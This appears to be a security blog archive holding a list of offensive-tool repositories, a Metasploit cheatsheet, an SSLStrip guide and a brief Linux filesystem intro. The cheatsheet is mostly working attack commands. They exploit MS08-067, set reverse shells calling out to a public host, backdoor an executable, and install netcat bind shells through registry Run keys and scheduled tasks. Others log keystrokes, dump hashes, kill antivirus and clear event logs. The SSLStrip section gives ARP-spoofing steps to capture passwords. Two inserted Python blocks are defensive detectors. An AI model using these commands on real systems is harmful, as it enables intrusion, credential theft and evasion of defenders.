Wednesday, March 30, 2022

Cool GitHub links - tools

https://github.com/hak5/bashbunny-payloads.git
https://github.com/BloodHoundAD/BloodHound.git
https://github.com/sekirkity/BrowserGather
https://github.com/commixproject/commix.git
https://github.com/byt3bl33d3r/CrackMapExec.git
https://github.com/leebaird/discover.git
https://github.com/iagox86/dnscat2.git
https://github.com/cheetz/Easy-P
https://github.com/EmpireProject/Empire
https://github.com/ChrisTruncer/EyeWitness.git
https://github.com/anshumanbh/git-all-secrets.git
https://github.com/OJ/gobuster.git
https://github.com/GreatSCT/GreatSCT.git
https://github.com/breenmachine/httpscreenshot
https://github.com/cheetz/icmpshock
https://github.com/danielbohannon/Invoke-Obfuscation.git
https://github.com/danielbohannon/Invoke-CradleCrafter.git
https://github.com/peewpw/Invoke-WCMDump.git
https://github.com/nidem/kerberoast.git
https://github.com/guelfoweb/knock.git
https://github.com/robertdavidgraham/masscan.git
https://github.com/blechschmidt/massdns.git
https://github.com/putterpanda/mimikittenz.git
https://github.com/samratashok/nishang.git
https://github.com/codingo/NoSQLMap.git
https://github.com/xorrior/RandomPS-Scripts.git
https://github.com/fireeye/ReelPhish.git
https://github.com/lgandx/Responder.git
https://github.com/leostat/rtfm.git
https://github.com/huntergregal/mimipenguin.git
https://github.com/rebootuser/LinEnum.git
https://github.com/mzet-/linux-exploit-suggester.git
https://github.com/Arno0x/EmbedInHTML
https://github.com/eladshamir/Internal-Monologue
https://github.com/trustedsec/unicorn.git
https://github.com/cheetz/generateJenkinsExploit.git
https://github.com/sensepost/ruler.git
https://github.com/danielmiessler/SecLists.git
https://github.com/mdsecactivebreach/SharpShooter.git
https://github.com/SimplySecurity/SimplyEmail.git
https://github.com/pentestgeek/smbexec.git
https://github.com/trustedsec/social-engineer-toolkit.git
https://github.com/SECFORCE/sparta.git
https://github.com/smicallef/spiderfoot.git
https://github.com/SpiderLabs/Spray.git
https://github.com/TheRook/subbrute.git
https://github.com/aboul3la/Sublist3r.git
https://github.com/anshumanbh/tko-subs.git
https://github.com/epinna/tplmap.git
https://github.com/dxa4481/truffleHog.git
https://github.com/Veil-Framework/Veil.git
https://github.com/wifiphisher/wifiphisher.git
https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
https://github.com/wpscanteam/wpscan.git
https://github.com/anshumanbh/tko-subs
https://github.com/cyberspacekittens/bloodhound.git
https://github.com/nahamsec/HostileSubBruteforcer.git
https://github.com/JordyZomer/autoSubTakeover.git
https://github.com/vulnersCom/nmap-vulners.git



Monday, March 28, 2022

METASPLOIT CHEATSHEET



Commands Only (Not for Script Kiddies):

1. Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.1
set payload windows/vncinject/bind_tcp
exploit


2. Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 5555
exploit
ps
migrate 1880
cd c:\
ls
download program-7.exe /root
run killav
shell


3. Hacking by Metasploit, Windows XP SP3, with B14CK_B34RD
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.10
set RHOST 192.168.1.1
set payload windows/meterpreter/reverse_tcp
exploit


4. Hacking Win7 with Metasploit
nmap -sS -v -PN 192.168.1.1-255
use exploit/multi/handler
set LHOST 192.168.1.10
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show options
set ExitOnSession false
show options
set RHOST 192.168.1.1
set RPORT 4321
show options
exploit


5. Metasploit - exploiting a vulnerability in Windows 7
sudo nmap 192.168.    # check the target with nmap -> 445/tcp open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1
set RPORT 445
run    # run the exploit


6. Metasploit backdooring
msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R | ./msfencode -t exe -x /tmp/kislay.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
root@b14ck# cd /tmp    # kislay.exe is here
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
show options
exploit

meterpreter >
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg *    # message displayed on the screen


7. MS10-025 Metasploit exploitation
nmap -O 192.168.1.7    # see the target operating system
search ms10
use exploit/windows/mmsp/ms10_025_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.1
exploit


8. IEPeers: ms10_018_ie_behaviors exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info    # Available targets: 1 = IE 6 SP0-SP2 (onclick)
exploit
Using URL: http://192.168.1.1:8080/
Open a browser (Mozilla or whichever browser is used)
Type http://192.168.1.1:8080/ and press Enter
Wait a few moments...


9. Metasploit RPC DCOM (MS03-026)
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1
set LHOST 192.168.1.10
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir


10. Uploading a Netcat backdoor with Metasploit
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v "windows live" -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe"
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555


11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter your choice: 4
Enter the IP address: 192.168.1.1
Enter choice (hit enter for default): 2
Enter choice (hit enter for default): 16
set port 4444
Open Konqueror at /pentest/exploits/SET/
/media/sda3    # copy msf.exe here
/pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
execute -f cmd
ipconfig
shell
screenshot
execute -f explorer


12. MS08-067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\

MORE Advanced Phun:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r <PublicIP> -p 21 -A -X -i 30

exploit -j -z

____________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf


use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r <PublicIP> -p 21 -A -X -i 30
run

________________________________________________________________________

# shows all the scripts
run [tab]

________________________________________________________________________

# persistence! broken if you use a DNS name ..
run persistence -r <PublicIP> -p 21 -A -X -i 30

________________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

________________________________________________________________________

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

________________________________________________________________________

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

________________________________________________________________________

# escalate to system
use priv
getsystem

________________________________________________________________________

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

________________________________________________________________________

# list top used apps
run prefetchtool -x 20
________________________________________________________________________
# list installed apps
run prefetchtool -p
________________________________________________________________________
run get_local_subnets
________________________________________________________________________
# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop" passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
________________________________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
________________________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
________________________________________________________________________

# runs some wmic commands etc.
run winenum
________________________________________________________________________


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
________________________________________________________________________
# Example: download Netcat via tftp and then run it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
________________________________________________________________________
# vnc / port fwd for linux
run vnc
________________________________________________________________________
# priv esc
run kitrap0d

________________________________________________________________________

run getgui
________________________________________________________________________
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winenum

run memdump

run screen_unlock
_________________________________________________________________________
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

__________________________________________________________________________


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________________________________________________
getuid



enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

________________________________________________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
________________________________________________________________________
# upload a script or executable and run it
uploadexec

________________________________________________________________________
# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011
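The Run-key autostarts above (this section, and items 10 and 12 earlier) are exactly what a defender wants to find on a host. As an added example that is not part of the original post, this Python audit takes a dump of Run values (name to command line) and flags the netcat bind-shell pattern; the entries are constructed from the page's own commands, and the SecurityHealth and OneDrive ones are made-up benign controls.

```python
import re
from typing import Dict, List, Tuple

# Added example (not from the cheatsheet): audit a dump of
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run values for the netcat
# bind-shell autostart the cheatsheet installs.  On a live host the dump
# would come from `reg query ...\Run` or winreg; here it is constructed.

NETCAT_NAMES = {"nc.exe", "nc64.exe", "netcat.exe", "ncat.exe"}
SHELLS = {"cmd", "cmd.exe", "command.com", "powershell", "powershell.exe"}
# Binaries named after a Windows directory, e.g. the "system32.exe" above.
DIR_MASQUERADE = {"system32.exe", "syswow64.exe", "windows.exe", "drivers.exe"}
USER_WRITABLE = re.compile(
    r"(?i)(%USERPROFILE%|%APPDATA%|%LOCALAPPDATA%|%TEMP%|%TMP%|"
    r"\\Users\\|Documents and Settings|\\Temp\\)")


def split_cmdline(cmd: str) -> Tuple[str, List[str]]:
    """Split a Windows command line into (executable, argument tokens)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):                      # quoted path with spaces
        end = cmd.find('"', 1)
        if end == -1:
            return cmd[1:], []
        return cmd[1:end], cmd[end + 1:].split()
    exe, _, rest = cmd.partition(" ")
    return exe, rest.split()


def audit_run_value(cmdline: str) -> List[str]:
    """Return the reasons (possibly none) a Run value deserves a look."""
    exe, args = split_cmdline(cmdline)
    base = exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    findings: List[str] = []
    if base in NETCAT_NAMES:
        findings.append("netcat binary registered for autostart")
    if base in DIR_MASQUERADE:
        findings.append("executable named after a system directory (masquerading)")
    if USER_WRITABLE.search(exe):
        findings.append("autostart binary lives in a user-writable location")

    listens = has_port = False
    for i, tok in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else ""
        if re.fullmatch(r"-[A-Za-z]+", tok):
            if "l" in tok.lower():               # -l / -L / -Ldp: listen
                listens = True
            if tok.endswith("p") and nxt.isdigit():    # -p 5555, -Ldp 455
                has_port = True
            if tok.lower() == "-e" and nxt.lower() in SHELLS:
                findings.append(f"spawns {nxt} for whoever connects (bind shell)")
    if listens and has_port:
        findings.append("listens on a TCP port at logon")
    return findings


def audit_run_values(values: Dict[str, str]) -> Dict[str, List[str]]:
    """Audit every Run value; only flagged names are returned."""
    flagged = {name: audit_run_value(cmd) for name, cmd in values.items()}
    return {name: why for name, why in flagged.items() if why}


# Constructed sample: the autostart entries the cheatsheet creates plus two
# ordinary ones for contrast.  "firewall" is a plain binary and is not caught.
SAMPLE_RUN_VALUES = {
    "windows live": r"c:\WINDOWS\SYSTEM32\netcat.exe -L -d -p 5555 -e cmd.exe",
    "system32": r"C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe",
    "firewall": r"c:\windows\system32\metabkdr.exe",
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
    "OneDrive": r'"C:\Users\pentest3\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

if __name__ == "__main__":
    for name, reasons in audit_run_values(SAMPLE_RUN_VALUES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

A bare reverse-connect binary such as the "firewall" entry carries no listener arguments and passes these heuristics; it needs a baseline of known autostarts or a signature check instead.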

_________________________________________________________________________

# kill AV: this will not unload it from memory, it still needs a reboot or killing from memory ... Darkspy, Seem, Icesword GUIs can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
__________________________________________________________________________

email me: pris@tyrellcorp.net

Metasploit reference commands

 
This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.

MSFconsole Commands

show exploits
Show all exploits within the Framework.

show payloads
Show all payloads within the Framework.

show auxiliary
Show all auxiliary modules within the Framework.

search name
Search for exploits or modules within the Framework.

info
Load information about a specific exploit or module.

use name
Load an exploit or module (example: use windows/smb/psexec).

LHOST
Your local host’s IP address reachable by the target, often the public IP
address when not on a local network. Typically used for reverse shells.

RHOST
The remote host or the target.

set function
Set a specific value (for example, LHOST or RHOST).

setg function
Set a specific value globally (for example, LHOST or RHOST).

show options
Show the options available for a module or exploit.

show targets
Show the platforms supported by the exploit.

set target num
Specify a specific target index if you know the OS and service pack.

set payload payload
Specify the payload to use.

show advanced
Show advanced options.

set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.

check
Determine whether a target is vulnerable to an attack.

exploit
Execute the module or exploit and attack the target.

exploit -j
Run the exploit under the context of the job. (This will run the exploit
in the background.)

exploit -z
Do not interact with the session after successful exploitation.

exploit -e encoder
Specify the payload encoder to use (example: exploit -e shikata_ga_nai).


exploit -h

Display help for the exploit command.

sessions -l
List available sessions (used when handling multiple shells).

sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability
was used when exploiting the system.

sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.

sessions -K
Kill all live sessions.

sessions -c cmd
Execute a command on all live Meterpreter sessions.

sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.

db_create name
Create a database to use with database-driven attacks (example: db_create
autopwn).

db_connect name
Create and connect to a database for driven attacks (example: db_connect
autopwn).

db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported,
such as -sT -v -P0.)

db_autopwn -h
Display help for using db_autopwn.

db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all
systems.

db_destroy
Delete the current database.

db_destroy user:password@host:port/database
Delete database using advanced options.

Meterpreter Commands


help
Open Meterpreter usage help.

run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter
directory.

sysinfo
Show the system information on the compromised target.

ls
List the files and folders on the target.


use priv
Load the privilege extension for extended Meterpreter libraries.

ps
Show all running processes and which accounts are associated with each
process.

migrate PID
Migrate to the specific process ID (PID is the target process ID gained
from the ps command).

use incognito
Load incognito functions. (Used for token stealing and impersonation on
a target machine.)

list_tokens -u
List available tokens on the target by user.

list_tokens -g
List available tokens on the target by group.

impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target.

steal_token PID
Steal the tokens available for a given process and impersonate that token.

drop_token
Stop impersonating the current token.

getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple
attack vectors.


shell
Drop into an interactive shell with all available tokens.

execute -f cmd.exe -i
Execute cmd.exe and interact with it.

execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens.

execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.

rev2self
Revert back to the original user you used to compromise the target.

reg command
Interact, create, delete, query, set, and much more in the target’s registry.

setdesktop number
Switch to a different screen based on who is logged in.

screenshot
Take a screenshot of the target’s screen.

upload file
Upload a file to the target.

download file
Download a file from the target.

keyscan_start
Start sniffing keystrokes on the remote target.

keyscan_dump
Dump the remote keys captured on the target.

keyscan_stop
Stop sniffing keystrokes on the remote target.

getprivs
Get as many privileges as possible on the target.

uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.

background
Run your current Meterpreter shell in the background.

hashdump
Dump all hashes on the target.

use sniffer
Load the sniffer module.

sniffer_interfaces
List the available interfaces on the target.

sniffer_dump interfaceID pcapname
Start sniffing on the remote target.

sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer.

sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.

sniffer_stop interfaceID
Stop the sniffer.

add_user username password -h ip
Add a user on the remote target.

add_group_user "Domain Admins" username -h ip
Add a username to the Domain Administrators group on the remote target.

clearev
Clear the event log on the target machine.

timestomp
Change file attributes, such as creation date (antiforensics measure).

reboot
Reboot the target machine.


MSFpayload Commands

msfpayload -h
List available payloads.

msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (all of
these can use any payload).

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5
on port 443, and then save it as a Windows Portable Executable
named payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
Same as above, but export as raw format. This will be used later in
msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.


MSFencode Commands


msfencode -h
Display the msfencode help.


msfencode -l
List the available encoders.


msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs,
loop-vbs, asp, war, macho)
Format to display the encoded buffer.


msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5
-t exe
Encode payload.raw with shikata_ga_nai five times and export it to an
output file named encoded_payload.exe.


msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
Create a multi-encoded payload.


msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode;
output in C-style notation.


MSFcli Commands

msfcli | grep exploit
Show only exploits.

msfcli | grep exploit/windows
Show only Windows exploits.

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E

Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload
being delivered to listen on port 443.


Meterpreter Post Exploitation Commands

http://pastebin.com/VmTtcz0A

Sporked from http://metasploited.blogspot.com/2011/08/metasploit-penetration-testers-guide.html

email us
PLUG-security@lists.plug.phoenix.az.us
pris@tyrellcorp.net

SSLStrip CHEATSHEET

Just like Ferengi - we like to be prepared:

# SSLStrip CHEATSHEET

OVERVIEW:

Requirements

    * Python >= 2.4 (apt-get install python)
    * The python "twisted-web" module (apt-get install twisted-web)

Setup

    * tar zxvf sslstrip-0.5.tar.gz
    * cd sslstrip-0.5
    * (optional) sudo python ./setup.py install

Running sslstrip

    * Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
    * Set up iptables to redirect HTTP traffic to sslstrip.
      (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
    * Run sslstrip. (sslstrip.py -l <listenPort>)
    * Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

Thanks to Moxie Marlinspike

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-speakers.html#Marlinspike

STEP BY STEP (for those who need it slower):

# Proxy Preparation

    * First verify routing and NAT:

    # cat /proc/sys/net/ipv4/ip_forward
    0

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    # cat /proc/sys/net/ipv4/ip_forward
    1

    # /sbin/iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# Start MITM

    * Arpspoof addresses to the default gateway (and target machine):

    # arpspoof -i eth0 -t 192.168.1.231 192.168.1.244

# SSL Strip

    * Start SSLStrip:

    # ./sslstrip -l 8080

    * Open a browser and log in to an SSL site, https://Gmail.com for instance.

    # tail -f sslstrip.log

You will log the name:password pairs for each site visited through the proxy.

As you can see, the default gateway and target machine can be seasoned to taste.

./sslstrip -h

------------------------------------end SHEETCHEAT
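From the defender's side, the arpspoof step in the walk-through above is the noisy part of this setup. As an added example that is not part of the cheatsheet, this Python function walks a list of observed ARP replies and alerts when an IP (above all the gateway's) moves to a new MAC or one MAC answers for several IPs; the replies are constructed around the page's addresses (target 192.168.1.231, gateway 192.168.1.244) and the MACs are invented.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Sequence

# Added example (not from the cheatsheet): spot the arpspoof step of the
# SSLStrip walk-through from the LAN side.  arpspoof keeps telling the target
# that the gateway IP now lives at the attacker's MAC, so the observable
# symptoms are (1) an IP, above all the gateway's, flipping to a new MAC and
# (2) one MAC claiming several IPs.  Replies are constructed around the
# addresses used above (target .231, gateway .244); MACs are made up.


class ArpReply(NamedTuple):
    ts: float          # seconds since capture start
    sender_ip: str     # "I am <ip> ..."
    sender_mac: str    # "... at <mac>"


def detect_arp_poisoning(replies: Sequence[ArpReply], gateway_ip: str) -> List[str]:
    """Return alert strings; an empty list means no poisoning symptom seen."""
    mac_history: Dict[str, List[str]] = defaultdict(list)   # ip -> MACs seen
    ips_per_mac: Dict[str, set] = defaultdict(set)          # mac -> IPs claimed
    alerts: List[str] = []
    for r in replies:
        mac = r.sender_mac.lower()
        hist = mac_history[r.sender_ip]
        if hist and hist[-1] != mac:
            # A genuine MAC change (new NIC) is rare; for the gateway it is
            # the signature of arpspoof, so rate it higher.
            sev = "HIGH" if r.sender_ip == gateway_ip else "MEDIUM"
            alerts.append(f"{sev} t={r.ts:.0f}s {r.sender_ip} moved {hist[-1]} -> {mac}")
        if not hist or hist[-1] != mac:
            hist.append(mac)
        ips_per_mac[mac].add(r.sender_ip)
    # One MAC answering for several IPs.  Legitimate for proxy ARP, VRRP/HSRP
    # routers or a host with address aliases, so allow-list those first.
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append(f"HIGH {mac} answers for {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


GATEWAY = "192.168.1.244"
# Constructed capture: normal traffic, then the attacker (MAC ...:aa) runs
# arpspoof against .231 and, in this scenario, also poisons the gateway's
# view of .231 so the return traffic flows through it as well.
SAMPLE_REPLIES = [
    ArpReply(0, "192.168.1.244", "00:11:22:33:44:01"),   # gateway, learned normally
    ArpReply(1, "192.168.1.231", "00:11:22:33:44:02"),   # the target
    ArpReply(2, "192.168.1.10", "00:11:22:33:44:03"),    # unrelated host
    ArpReply(30, "192.168.1.244", "00:11:22:33:44:AA"),  # "gateway is at :aa" - poison
    ArpReply(32, "192.168.1.244", "00:11:22:33:44:AA"),  # repeated every 2 s
    ArpReply(33, "192.168.1.231", "00:11:22:33:44:AA"),  # "target is at :aa"
]

if __name__ == "__main__":
    for line in detect_arp_poisoning(SAMPLE_REPLIES, GATEWAY):
        print(line)
```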

Sunday, March 27, 2022

Linux - Week 1 Getting Started, The Shell & Basic File Management

Linux adheres to the Filesystem Hierarchy Standard (FHS), which provides a familiar and universal layout for all Linux users. The directories you will find most useful are:

• /bin - basic programs (ls, cd, cat, etc.)
• /sbin - system programs (fdisk, mkfs, sysctl, etc.)
• /etc - configuration files
• /tmp - temporary files (typically deleted on boot)
• /usr/bin - applications (apt, ncat, nmap, etc.)
• /usr/share - application support and data files

There are many other directories, most of which you will rarely need to enter, but a good familiarity with the layout of the Linux filesystem will help your efficiency immensely.